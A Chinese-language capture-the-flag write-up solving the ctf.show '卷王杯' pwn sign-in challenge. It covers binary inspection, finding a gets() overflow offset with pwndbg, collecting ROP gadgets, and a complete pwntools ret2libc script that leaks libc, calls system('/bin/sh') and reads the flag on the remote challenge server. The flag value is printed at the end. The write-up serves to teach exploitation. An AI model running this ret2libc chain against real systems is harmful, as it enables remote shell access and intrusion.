ctf.show 卷王杯 pwn签到

pwn签到 64位 ret2libc

pwn签到

(1)

motaly@motaly-VMware-Virtual-Platform:~/桌面$ file pwn
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0953abcf1dd632cfaa759f2f2948343f9ea5fffa, not stripped
motaly@motaly-VMware-Virtual-Platform:~/桌面$ checksec --file=pwn
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   67 Symbols	  No	0		1		pwn

(2)

用ida打开，按下F5(如果不行，看看有没有Fn键，Fn+F5)

int __fastcall main(int argc, const char **argv, const char **envp)
{_BYTE v4[32]; // [rsp+0h] [rbp-20h] BYREFalarm(0x3Cu);setvbuf(stdout, 0LL, 2, 0LL);setvbuf(stdin, 0LL, 2, 0LL);setvbuf(stderr, 0LL, 2, 0LL);puts("This is easier than you would think...");puts("Santa allowed you to ROP me!");gets(v4);return 0;
}

看到gets函数，有缓冲区溢出，用pwngdb调试

otaly@motaly-VMware-Virtual-Platform:~/桌面$ gdb pwn
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:<http://www.gnu.org/software/gdb/documentation/>.For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from pwn...This GDB supports auto-downloading debuginfo from the following URLs:<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in pwn)
------- tip of the day (disable with set show-tips off) -------
Pwndbg sets the SIGLARM, SIGBUS, SIGPIPE and SIGSEGV signals so they are not passed to the app; see info signals for full GDB signals configuration
pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
pwndbg> r
Starting program: /home/motaly/桌面/pwn 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
This is easier than you would think...
Santa allowed you to ROP me!
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaaProgram received signal SIGSEGV, Segmentation fault.
0x0000000000400712 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────RAX  0RBX  0x7fffffffd838 —▸ 0x7fffffffdc0a ◂— 0x6f6d2f656d6f682f ('/home/mo')RCX  0x7ffff7e038e0 (_IO_2_1_stdin_) ◂— 0xfbad208bRDX  0RDI  0x7ffff7e05720 (_IO_stdfile_0_lock) ◂— 0RSI  0x7ffff7e03963 (_IO_2_1_stdin_+131) ◂— 0xe05720000000000a /* '\n' */R8   0R9   0R10  0x7ffff7c0e008 ◂— 0x110022000047e8R11  0x246R12  1R13  0R14  0R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0RBP  0x6161616161616165 ('eaaaaaaa')RSP  0x7fffffffd718 ◂— 'faaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'RIP  0x400712 (main+156) ◂— ret 
─────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────► 0x400712 <main+156>    ret                                <0x6161616161616166>↓───────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 'faaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
01:0008│     0x7fffffffd720 ◂— 'gaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
02:0010│     0x7fffffffd728 ◂— 'haaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
03:0018│     0x7fffffffd730 ◂— 'iaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
04:0020│     0x7fffffffd738 ◂— 'jaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
05:0028│     0x7fffffffd740 ◂— 'kaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
06:0030│     0x7fffffffd748 ◂— 'laaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
07:0038│     0x7fffffffd750 ◂— 'maaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'
─────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────► 0         0x400712 main+1561 0x6161616161616166 None2 0x6161616161616167 None3 0x6161616161616168 None4 0x6161616161616169 None5 0x616161616161616a None6 0x616161616161616b None7 0x616161616161616c None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40

得到偏移量为40

(3)

发现无 system，无 "/bin/sh"，所以是64位的ret2libc，这里选用puts函数来获得libc基址

因为是64位，需要堆栈平衡和puts函数有一个参数，所以要ret和寄存器rdi

motaly@motaly-VMware-Virtual-Platform:~/桌面$ ROPgadget --binary ./pwn --only 'pop|ret'
Gadgets information
============================================================
0x0000000000400774 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400776 : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400778 : pop r14 ; pop r15 ; ret
0x000000000040077a : pop r15 ; ret
0x0000000000400773 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400777 : pop rbp ; pop r14 ; pop r15 ; ret
0x000000000040065d : pop rbp ; ret
0x000000000040077b : pop rdi ; ret
0x0000000000400779 : pop rsi ; pop r15 ; ret
0x0000000000400775 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040053e : ret
0x0000000000400542 : ret 0x200a

得到ret的地址0x40053e和rdi的地址0x40077b

(4)

编写

from pwn import *
from LibcSearcher import*
context(os='linux',arch='amd64',log_level='debug')
io=remote('pwn.challenge.ctf.show',28228)
# io = process('/home/motaly/桌面/pwn')
elf=ELF('/home/motaly/桌面/pwn')puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=elf.sym['main']
rdi=0x40077b
ret=0x40053epayload=b'a'*40+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendlineafter(b'Santa allowed you to ROP me!\n',payload)puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.success('puts_addr ：'+hex(puts_addr))libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
log.success('libc base: '+hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')payload=b'a'*40+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system)
io.sendlineafter(b'Santa allowed you to ROP me!\n',payload)io.interactive()

(5)

连接得到flag

motaly@motaly-VMware-Virtual-Platform:~/桌面$ python3  159.py
[+] Opening connection to pwn.challenge.ctf.show on port 28228: Done
[*] '/home/motaly/桌面/pwn'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)
[DEBUG] Received 0x44 bytes:b'This is easier than you would think...\n'b'Santa allowed you to ROP me!\n'
[DEBUG] Sent 0x49 bytes:00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│*00000020  61 61 61 61  61 61 61 61  7b 07 40 00  00 00 00 00  │aaaa│aaaa│{·@·│····│00000030  18 10 60 00  00 00 00 00  50 05 40 00  00 00 00 00  │··`·│····│P·@·│····│00000040  76 06 40 00  00 00 00 00  0a                        │v·@·│····│·│00000049
[DEBUG] Received 0x4b bytes:00000000  c0 c9 18 31  f6 7f 0a 54  68 69 73 20  69 73 20 65  │···1│···T│his │is e│00000010  61 73 69 65  72 20 74 68  61 6e 20 79  6f 75 20 77  │asie│r th│an y│ou w│00000020  6f 75 6c 64  20 74 68 69  6e 6b 2e 2e  2e 0a 53 61  │ould│ thi│nk..│.·Sa│00000030  6e 74 61 20  61 6c 6c 6f  77 65 64 20  79 6f 75 20  │nta │allo│wed │you │00000040  74 6f 20 52  4f 50 20 6d  65 21 0a                  │to R│OP m│e!·│0000004b
[+] puts_addr ：0x7ff63118c9c0
[+] There are multiple libc that meet current constraints :
0 - libc6_2.27-0ubuntu2_amd64
1 - libc-2.36-22.mga9.i586
2 - libc6_2.19-0ubuntu6.5_amd64
3 - libc6_2.27-3ubuntu1_amd64
4 - libc-2.36-33.mga9.i586
5 - libc6_2.37-0ubuntu1_amd64
6 - libc6_2.27-0ubuntu3_amd64
7 - libc-2.32-6.fc33.i686
8 - libc-2.32-8.fc33.i686
9 - libc-2.32-7.fc33.i686
[+] Choose one : 3
[+] libc base: 0x7ff63110c000
[DEBUG] Sent 0x49 bytes:00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│*00000020  61 61 61 61  61 61 61 61  3e 05 40 00  00 00 00 00  │aaaa│aaaa│>·@·│····│00000030  7b 07 40 00  00 00 00 00  9a fe 2b 31  f6 7f 00 00  │{·@·│····│··+1│····│00000040  40 b4 15 31  f6 7f 00 00  0a                        │@··1│····│·│00000049
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:b'ls\n'
[DEBUG] Received 0x64 bytes:b'bin\n'b'boot\n'b'dev\n'b'etc\n'b'flag\n'b'home\n'b'lib\n'b'lib32\n'b'lib64\n'b'media\n'b'mnt\n'b'opt\n'b'proc\n'b'pwn\n'b'root\n'b'run\n'b'sbin\n'b'srv\n'b'sys\n'b'tmp\n'b'usr\n'b'var\n'
bin
boot
dev
etc
flag
home
lib
lib32
lib64
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var
$ cat  flag
[DEBUG] Sent 0xa bytes:b'cat  flag\n'
[DEBUG] Received 0x2e bytes:b'ctfshow{91e24165-1656-46e7-ae12-571f5f1f5b4d}\n'
ctfshow{91e24165-1656-46e7-ae12-571f5f1f5b4d}